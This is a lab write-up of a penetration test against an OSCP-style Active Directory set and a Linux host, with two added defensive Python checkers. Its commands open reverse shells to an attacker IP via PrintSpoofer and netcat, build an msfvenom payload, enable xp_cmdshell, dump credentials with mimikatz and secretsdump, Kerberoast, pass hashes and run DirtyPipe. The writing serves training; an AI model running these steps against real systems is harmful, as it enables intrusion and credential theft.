Information
About this lab
This lab challenges learners to exploit exposed services and misconfigurations in an Active Directory environment. Starting with a Kerberoasting attack to crack service account credentials, learners perform lateral movement, configure SQL Server for command execution, and escalate privileges to NT AUTHORITY\SYSTEM using the SeImpersonatePrivilege. The exercise culminates in a domain compromise through hash extraction and reuse.
Active Directory Set
192.168.162.147 - MS01
Eric.Wallows / EricLikesRunning800
Nmap
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5040/tcp open unknown
5985/tcp open wsman
8000/tcp open http-alt
8080/tcp open http-proxy
8443/tcp open https-alt
47001/tcp open winrm
Initial Access
Connected to 192.168.162.147 via winrm using provided credentials
┌──(kali🎃kali)-[~]
└─$ evil-winrm -i 192.168.162.147 -u 'Eric.Wallows' -p 'EricLikesRunning800'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\eric.wallows\Documents>
Privilege Escalation
Found SeImpersonatePrivilege enabled on the user
PS C:\Users> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
Found that the spoolsv service is running
PS C:\Users> ps | findstr spoolsv
436 20 5140 14980 2132 0 spoolsv
Uploaded the PrintSpoofer64.exe and nc64.exe files
*Evil-WinRM* PS C:\Users\eric.wallows\Desktop> upload ~/Tools/PrintSpoofer64.exe
Info: Uploading /home/kali/Tools/PrintSpoofer64.exe to C:\Users\eric.wallows\Desktop\PrintSpoofer64.exe
Data: 36180 bytes of 36180 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\eric.wallows\Desktop> upload ~/Tools/nc64.exe
Info: Uploading /home/kali/Tools/nc64.exe to C:\Users\eric.wallows\Desktop\nc64.exe
Data: 60360 bytes of 60360 bytes copied
Info: Upload successful!
Executed PrintSpoofer
*Evil-WinRM* PS C:\Users\eric.wallows\Desktop> .\PrintSpoofer64.exe -c "nc64.exe 192.168.45.187 9999 -e powershell"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Successfully established a reverse shell connection with SYSTEM privileges
┌──(kali🎃kali)-[~/Tools]
└─$ rlwrap nc -nlvp 9999
listening on [any] 9999 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.162.147] 62788
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Windows\system32> whoami
whoami
nt authority\system
Post-Exploitation
Added Eric.Wallows to the Administrators local group
PS C:\Users> net localgroup Administrators Eric.Wallows /add
net localgroup Administrators Eric.Wallows /add
The command completed successfully.
Enumerated local user accounts
PS C:\Users\eric.wallows\Documents> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
Mary.Williams support WDAGUtilityAccount
The command completed with one or more errors.
Enumerated domain user accounts
PS C:\Users> net user /domain
The request will be processed at a domain controller for domain oscp.exam.
User accounts for \\DC01.oscp.exam
-------------------------------------------------------------------------------
Administrator Aimee.Hunt Carol.Webb
celia.almeda Chelsea.Byrne Donna.Johnson
Emily.Bishop eric.wallows Frank.Farrell
Georgina.Begum Guest Jamie.Thomas
Jane.Booth Janice.Turner Joan.North
john.dorian Kenneth.Coles krbtgt
Lawrence.Kay Leonard.Morris Linda.Patel
Luke.Martin Oliver.Gray Sandra.Craig
Shane.Mitchell sql_svc Thomas.Robinson
tom.kinney tom_admin web_svc
The command completed successfully.
Used NetExec with the lsassy module to dump credentials from memory and obtained NTLM hashes for web_svc and Administrator
┌──(kali🎃kali)-[~/oscp/ad_set/147]
└─$ nxc smb 192.168.162.147 -u 'Eric.Wallows' -p 'EricLikesRunning800' -M lsassy
SMB 192.168.162.147 445 MS01 [*] Windows 10 / Server 2019 Build 19041 x64 (name:MS01) (domain:oscp.exam) (signing:False) (SMBv1:False)
SMB 192.168.162.147 445 MS01 [+] oscp.exam\Eric.Wallows:EricLikesRunning800 (Pwn3d!)
LSASSY 192.168.162.147 445 MS01 OSCP\web_svc 53e938166782a44e241beaf02d081ff6
LSASSY 192.168.162.147 445 MS01 MS01\Administrator 3c4495bbd678fac8c9d218be4f2bbc7b
Dumped local SAM hashes using secretsdump
┌──(kali🎃kali)-[~/oscp/ad_set/147]
└─$ impacket-secretsdump oscp.exam/Eric.Wallows:"EricLikesRunning800"@192.168.162.147
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa5403534b0978445a2df2d30d19a7980
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3c4495bbd678fac8c9d218be4f2bbc7b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:11ba4cb6993d434d8dbba9ba45fd9011:::
Mary.Williams:1002:aad3b435b51404eeaad3b435b51404ee:9a3121977ee93af56ebd0ef4f527a35e:::
support:1003:aad3b435b51404eeaad3b435b51404ee:d9358122015c5b159574a88b3c0d2071:::
Cracked NTLM hashes and obtained plaintext passwords:
- Diamond1
- Freedom1
- December31
┌──(kali🎃kali)-[~/oscp/ad_set]
└─$ hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --quiet
/home/kali/.local/share/hashcat/hashcat.dictstat2: Outdated header version, ignoring content
53e938166782a44e241beaf02d081ff6:Diamond1
d9358122015c5b159574a88b3c0d2071:Freedom1
3c4495bbd678fac8c9d218be4f2bbc7b:December31
Pivoting
Executed ligolo-ng proxy on my Kali Linux machine
┌──(kali🎃kali)-[~/oscp/ad_set]
└─$ sudo ligolo-proxy -selfcert
INFO[0000] Loading configuration file ligolo-ng.yaml
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/
Made in France ♥ by @Nicocha30!
Version: dev
ligolo-ng » INFO[0020] Agent joined. id=005056ab9772 name="OSCP\\eric.wallows@MS01" remote="192.168.162.147:62830"
ligolo-ng »
ligolo-ng » session
? Specify a session : 1 - OSCP\eric.wallows@MS01 - 192.168.162.147:62830 - 005056ab9772
[Agent : OSCP\eric.wallows@MS01] » interface_create --name ligolo
INFO[0031] Creating a new ligolo interface...
INFO[0031] Interface created!
[Agent : OSCP\eric.wallows@MS01] » start
INFO[0036] Starting tunnel to OSCP\eric.wallows@MS01 (005056ab9772)
[Agent : OSCP\eric.wallows@MS01] » route_add --name ligolo --route 10.10.119.0/24
INFO[0054] Route created.
Executed the ligolo-ng agent on the target machine and connected back to my Kali Linux machine for pivoting
*Evil-WinRM* PS C:\Users\eric.wallows\Desktop> .\agent -connect 192.168.45.187:11601 -ignore-cert
10.10.119.148 - MS02
Nmap
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsman
Lateral Movement (MS01 to MS02)
Performed Kerberoasting attack using impacket-GetUserSPNs and obtained TGS hashes for sql_svc and web_svc
┌──(kali🎃kali)-[~/oscp/ad_set]
└─$ impacket-GetUserSPNs -request -dc-ip 10.10.119.146 oscp.exam/eric.wallows
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------- -------- -------------------------- -------------------------- ----------
MSSQL/MS02.oscp.exam sql_svc 2022-11-10 03:03:18.456165 2022-11-10 06:15:51.783016
HTTP/MS01.oscp.exam web_svc 2022-11-11 02:11:19.795439 2025-12-17 10:27:17.019965
[-] CCache file is not found. Skipping...
Cracked the TGS hashes and recovered plaintext passwords:
- web_svc: Diamond1
- sql_svc: Dolphin1
┌──(kali🎃kali)-[~/oscp/ad_set]
└─$ hashcat -m 13100 spn_hash.hash /usr/share/wordlists/rockyou.txt --quiet
$krb5tgs$23$*web_svc$OSCP.EXAM$oscp.exam/web_svc*$e711dcc8304bcc618bf8b849ee0797b1$...:Diamond1
$krb5tgs$23$*sql_svc$OSCP.EXAM$oscp.exam/sql_svc*$ac60853fd980060e9925327a82d754d8$...:Dolphin1
Connected to the MSSQL console using the previously obtained sql_svc credentials
┌──(kali🎃kali)-[~/oscp/ad_set/148]
└─$ impacket-mssqlclient oscp.exam/sql_svc:Dolphin1@10.10.119.148 -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MS02\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MS02\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
Privilege Escalation
Enabled command execution
SQL (OSCP\sql_svc dbo@master)> EXEC sp_configure 'show advanced options', 1; -- priv
INFO(MS02\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (OSCP\sql_svc dbo@master)> RECONFIGURE;
SQL (OSCP\sql_svc dbo@master)> EXEC sp_configure 'xp_cmdshell', 1;
INFO(MS02\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (OSCP\sql_svc dbo@master)> RECONFIGURE;
SQL (OSCP\sql_svc dbo@master)>
Confirmed that SeImpersonatePrivilege is enabled
SQL (OSCP\sql_svc dbo@master)> EXEC xp_cmdshell 'whoami /priv'
output
--------------------------------------------------------------------------------
NULL
PRIVILEGES INFORMATION
----------------------
NULL
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
NULL
Generated a reverse shell executable (payload.exe)
┌──(kali🎃kali)-[~/Tools]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.187 LPORT=8000 -f exe -o payload.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7680 bytes
Saved as: payload.exe
Configured port forwarding on ligolo-ng
ligolo-ng » listener_add --addr 0.0.0.0:9999 --to 127.0.0.1:9999
Downloaded PrintSpoofer64.exe and nc64.exe
SQL (OSCP\sql_svc dbo@master)> EXEC xp_cmdshell 'powershell -c "curl.exe http://10.10.119.147:9999/PrintSpoofer64.exe -o C:\Users\Public\PrintSpoofer64.exe';
output
----------------------------------------------------------------------------------
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1245 100 1245 0 0 817k 0 --:--:-- --:--:-- --:--:-- 1215k
NULL
SQL (OSCP\sql_svc dbo@master)> EXEC xp_cmdshell 'powershell -c "curl.exe http://10.10.119.147:9999/nc64.exe -o C:\Users\Public\nc64.exe';
output
----------------------------------------------------------------------------------
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 7680 100 7680 0 0 17878 0 --:--:-- --:--:-- --:--:-- 17860
NULL
Executed PrintSpoofer64.exe to exploit SeImpersonatePrivilege and establish an elevated reverse shell connection
SQL (OSCP\sql_svc dbo@master)> exec xp_cmdshell 'C:\Users\Public\PrintSpoofer64.exe -c "nc64.exe 10.10.119.147 9999 -e powershell"';
output
-------------------------------------------
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
NULL
Successfully received reverse shell connection
┌──(kali🎃kali)-[~/Tools]
└─$ rlwrap nc -nlvp 9999
listening on [any] 9999 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 49800
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
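Both escalations above started from a whoami /priv listing with SeImpersonatePrivilege enabled, once in an interactive shell on MS01 and once through xp_cmdshell on MS02. The script below is an added example, not code from the write-up: it parses either form of the listing (including the NULL padding rows xp_cmdshell emits) and flags privileges that give a path to SYSTEM. The privilege list is the editor's own, and the two sample listings are constructed from the output above.

```python
"""Flag token privileges that give a path to SYSTEM in `whoami /priv` output.

Added example, not code from the write-up. It parses the privilege table both
as printed in the MS01 shell and as returned through xp_cmdshell on MS02
(rows wrapped in an `output` column with NULL padding). The privilege list is
the editor's own; SeImpersonatePrivilege is the one PrintSpoofer abused here.
"""
import re

# Privileges that let their holder obtain a SYSTEM token or equivalent access.
# A Disabled entry still counts: the process holding it can re-enable it with
# AdjustTokenPrivileges, so only removal from the token closes the path.
ESCALATION_PRIVS = {
    "SeImpersonatePrivilege": "impersonate any client that connects to a named pipe (PrintSpoofer, Potato family)",
    "SeAssignPrimaryTokenPrivilege": "start a process under an arbitrary token",
    "SeDebugPrivilege": "open and inject into SYSTEM processes",
    "SeBackupPrivilege": "read any file, including the SAM and SYSTEM hives",
    "SeRestorePrivilege": "write any file or registry key",
    "SeTakeOwnershipPrivilege": "take ownership of protected objects",
    "SeLoadDriverPrivilege": "load a kernel driver",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeManageVolumePrivilege": "raw volume access, i.e. arbitrary file write",
}

# One table row: privilege name, free-text description, state. Header rows, the
# separator rows and xp_cmdshell's NULL rows do not start with Se...Privilege.
ROW_RE = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")


def parse_privileges(text):
    """Return {privilege: state} from whoami /priv output in either form."""
    privs = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def find_escalation_paths(text):
    """Return [(privilege, state, why)] for held privileges in ESCALATION_PRIVS."""
    return [(p, s, ESCALATION_PRIVS[p])
            for p, s in parse_privileges(text).items() if p in ESCALATION_PRIVS]


# Constructed samples modelled on the two listings above.
MS01_PRIV = """\
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= =======
SeShutdownPrivilege           Shut down the system                      Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled
SeTimeZonePrivilege           Change the time zone                      Enabled
"""

MS02_PRIV = """\
output
--------------------------------------------------------------------------------
NULL
PRIVILEGES INFORMATION
----------------------
NULL
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
NULL
"""

if __name__ == "__main__":
    for host, text in (("MS01", MS01_PRIV), ("MS02 via xp_cmdshell", MS02_PRIV)):
        for priv, state, why in find_escalation_paths(text):
            print(f"{host}: {priv} ({state}) -> {why}")
```

A service account such as sql_svc legitimately holds SeImpersonatePrivilege, so the finding on MS02 is really about xp_cmdshell: enabling it hands that token to anyone with a SQL login.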
Post-Exploitation
Executed mimikatz.exe and obtained Administrator NTLM hash:
- 59b280ba707d22e3ef0aa587fc29ffe5
PS C:\Users\Administrator\Desktop> .\mimikatz.exe
.\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 401094 (00000000:00061ec6)
Session : Interactive from 1
User Name : Administrator
Domain : OSCP
Logon Server : DC01
Logon Time : 2/12/2025 1:41:25 PM
SID : S-1-5-21-2610934713-1581164095-2706428072-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : OSCP
* NTLM : 59b280ba707d22e3ef0aa587fc29ffe5
* SHA1 : f41a495e6d341c7416a42abd14b9aef6f1eb6b17
* DPAPI : 959ad2ea78c63aebf3233679ad90d769
tspkg :
wdigest :
* Username : Administrator
* Domain : OSCP
* Password : (null)
kerberos :
* Username : Administrator
* Domain : OSCP.EXAM
* Password : (null)
ssp :
credman :
cloudap :
10.10.119.146 - DC01
Lateral Movement (MS02 to DC01)
Connected to DC01 using previously obtained Administrator NTLM hash via winrm
┌──(kali🎃kali)-[~/oscp/ad_set]
└─$ evil-winrm -i 10.10.119.146 -u 'Administrator' -H '59b280ba707d22e3ef0aa587fc29ffe5'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Read proof.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/17/2025 11:26 PM 34 proof.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type proof.txt
3d02391b0b34ce1aea57965ad4babbe1
Independent Challenges
192.168.162.149 - Kiero
Nmap
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
161/udp open snmp
Initial Access
Found SNMP community string using hydra: public
┌──(kali🎃kali)-[~/oscp/149]
└─$ hydra -P /usr/share/wordlists/seclists/Discovery/SNMP/common-snmp-community-strings.txt snmp://192.168.162.149
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-12-21 23:59:53
[DATA] max 16 tasks per 1 server, overall 16 tasks, 118 login tries (l:1/p:118), ~8 tries per task
[DATA] attacking snmp://192.168.162.149:161/
[161][snmp] host: 192.168.162.149 password: public
[STATUS] attack finished for 192.168.162.149 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-12-21 23:59:53
Enumerated SNMP data using snmpwalk, found that kiero’s password had been reset to the default, and identified the user ‘john’
┌──(kali🎃kali)-[~/oscp/149]
└─$ snmpwalk -v2c -c public 192.168.162.149 NET-SNMP-EXTEND-MIB::nsExtendObjects
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendCommand."RESET" = STRING: ./home/john/RESET_PASSWD
NET-SNMP-EXTEND-MIB::nsExtendArgs."RESET" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendInput."RESET" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."RESET" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."RESET" = INTEGER: exec(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."RESET" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."RESET" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStatus."RESET" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."RESET" = STRING: Resetting password of kiero to the default value
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."RESET" = STRING: Resetting password of kiero to the default value
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."RESET" = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendResult."RESET" = INTEGER: 0
NET-SNMP-EXTEND-MIB::nsExtendOutLine."RESET".1 = STRING: Resetting password of kiero to the default value
Successfully logged into the FTP service using kiero’s default credentials (kiero/kiero)
┌──(kali🎃kali)-[~/oscp/149]
└─$ ftp 192.168.162.149
Connected to 192.168.162.149.
220 (vsFTPd 3.0.3)
Name (192.168.162.149:kali): kiero
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
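The snmpwalk output above is the misconfiguration that handed over kiero's account: an extend entry whose command resets a password and runs every time the entry is read, reachable with the default community string. The checker below is an added example, not part of the write-up; it parses nsExtend* lines of that shape and flags extend entries with side effects. The sample is the walk above, reproduced as a constructed string.

```python
"""Audit NET-SNMP-EXTEND entries from snmpwalk output for commands with side effects.

Added example, not part of the write-up. Parses NET-SNMP-EXTEND-MIB::nsExtend*
lines as snmpwalk prints them above and flags extend entries whose command runs
on every read, which is how a default community string reset kiero's password.
The sample is the walk above, reproduced as a constructed string.
"""
import re
from collections import defaultdict

# e.g. NET-SNMP-EXTEND-MIB::nsExtendRunType."RESET" = INTEGER: run-on-read(1)
#      NET-SNMP-EXTEND-MIB::nsExtendOutLine."RESET".1 = STRING: Resetting ...
LINE_RE = re.compile(
    r'^NET-SNMP-EXTEND-MIB::(?P<obj>nsExtend\w+)\."(?P<name>[^"]+)"(?:\.\d+)?'
    r"\s*=\s*(?P<type>STRING|INTEGER):\s?(?P<value>.*)$"
)


def parse_extend(text):
    """Return {entry_name: {object: value}}; nsExtendNumEntries and foreign lines are skipped."""
    entries = defaultdict(dict)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        obj, name, value = m["obj"], m["name"], m["value"].strip()
        if obj == "nsExtendOutLine":            # indexed, one object per output line
            entries[name].setdefault(obj, []).append(value)
        else:
            entries[name][obj] = value
    return dict(entries)


def audit_extend(text):
    """Return [(entry, command, [issues])] for extend entries a defender should remove or restrict."""
    findings = []
    for name, e in parse_extend(text).items():
        cmd = e.get("nsExtendCommand", "")
        issues = []
        if e.get("nsExtendRunType", "").startswith("run-on-read") and \
           e.get("nsExtendStatus", "").startswith("active"):
            issues.append("command executes on every SNMP read of this entry, so any reader triggers it")
        if not cmd.startswith("/"):
            issues.append("command path is relative and resolves against snmpd's working directory")
        if e.get("nsExtendStorage", "").startswith("permanent"):
            issues.append("defined in snmpd.conf, so it survives restarts")
        out = e.get("nsExtendOutputFull", "")
        if re.search(r"passw|reset|delete|restart", out, re.I):
            issues.append(f"output describes a side effect: {out!r}")
        if issues:
            findings.append((name, cmd, issues))
    return findings


# Constructed copy of the snmpwalk output above.
SAMPLE_WALK = """\
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendCommand."RESET" = STRING: ./home/john/RESET_PASSWD
NET-SNMP-EXTEND-MIB::nsExtendArgs."RESET" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendInput."RESET" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."RESET" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."RESET" = INTEGER: exec(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."RESET" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."RESET" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStatus."RESET" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."RESET" = STRING: Resetting password of kiero to the default value
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."RESET" = STRING: Resetting password of kiero to the default value
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."RESET" = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendResult."RESET" = INTEGER: 0
NET-SNMP-EXTEND-MIB::nsExtendOutLine."RESET".1 = STRING: Resetting password of kiero to the default value
"""

if __name__ == "__main__":
    for name, cmd, issues in audit_extend(SAMPLE_WALK):
        print(f"[{name}] {cmd}")
        for i in issues:
            print(f"  - {i}")
```

Extend commands should only ever report state, never change it, and the community that can read them should be scoped to a view and a source range or replaced by SNMPv3 authPriv.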
Found the id_rsa file and downloaded it
ftp> ls
229 Entering Extended Passive Mode (|||10092|)
150 Here comes the directory listing.
-rwxr-xr-x 1 114 119 2590 Nov 21 2022 id_rsa
-rw-r--r-- 1 114 119 563 Nov 21 2022 id_rsa.pub
-rwxr-xr-x 1 114 119 2635 Nov 21 2022 id_rsa_2
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||10096|)
150 Opening BINARY mode data connection for id_rsa (2590 bytes).
100% |**********************************************************************************************************************************| 2590 12.60 MiB/s 00:00 ETA
226 Transfer complete.
2590 bytes received in 00:00 (34.42 KiB/s)
Successfully authenticated to SSH as john using the id_rsa private key
┌──(kali🎃kali)-[~/oscp/149]
└─$ ssh john@192.168.162.149 -i id_rsa
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Last login: Tue Nov 22 08:31:27 2022 from 192.168.118.3
john@oscp:~$
Read local.txt
john@oscp:~$ cat local.txt
93b73fcc70fa22d1422986943bbb9399
Privilege Escalation
Executed linpeas and found exploitable CVEs
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-3490] eBPF ALU32 bounds tracking for bitwise ops
Details: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story
Exposure: probable
Tags: ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}
Download URL: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: less probable
Tags: ubuntu=(20.04){kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2022-0847] DirtyPipe
Details: https://dirtypipe.cm4all.com/
Exposure: less probable
Tags: ubuntu=(20.04|21.04),debian=11
Download URL: https://haxx.in/files/dirtypipez.c
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
Executed the CVE-2022-0847 (DirtyPipe) PoC exploit and successfully escalated privileges to root
john@oscp:~/dirtypipe$ l
compile.sh exploit-1.c exploit-2.c
john@oscp:~/dirtypipe$ chmod 777 compile.sh
john@oscp:~/dirtypipe$ ./compile.sh
john@oscp:~/dirtypipe$ ll
total 68
drwxr-xr-x 2 john john 4096 Dec 22 06:28 ./
drwxr-xr-x 7 john john 4096 Dec 22 06:27 ../
-rwxrwxrwx 1 john john 71 Dec 22 06:27 compile.sh*
-rwxr-xr-x 1 john john 17624 Dec 22 06:28 exploit-1*
-rw-r--r-- 1 john john 5364 Dec 22 06:27 exploit-1.c
-rwxr-xr-x 1 john john 18040 Dec 22 06:28 exploit-2*
